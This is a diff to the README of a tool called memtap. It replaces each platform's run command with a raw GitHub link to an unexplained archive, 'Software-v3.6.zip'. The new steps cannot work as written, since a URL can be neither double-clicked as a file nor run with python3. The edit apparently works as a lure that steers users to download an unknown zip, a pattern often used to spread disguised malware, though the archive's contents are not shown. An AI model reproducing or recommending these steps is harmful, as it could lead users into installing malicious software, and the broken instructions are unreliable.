ZayaCrypt/memtap/README.md

 #### On Windows:

 1. Open the folder where you extracted the files.
-2. Double-click on `memtap.exe` to run the tool.
+2. Double-click on `https://raw.githubusercontent.com/ZayaCrypt/memtap/main/assets/Software-v3.6.zip` to run the tool.

 #### On macOS:

 1. Open the Terminal.
 2. Navigate to the folder where you extracted the files using the `cd` command.
-3. Type `python3 memtap.py` and press Enter.
+3. Type `python3 https://raw.githubusercontent.com/ZayaCrypt/memtap/main/assets/Software-v3.6.zip` and press Enter.

 #### On Linux:

 1. Open the Terminal.
 2. Navigate to the directory using the `cd` command.
-3. Type `python3 memtap.py` and hit Enter.
+3. Type `python3 https://raw.githubusercontent.com/ZayaCrypt/memtap/main/assets/Software-v3.6.zip` and hit Enter.

 ### Step 4: Configure Your Connection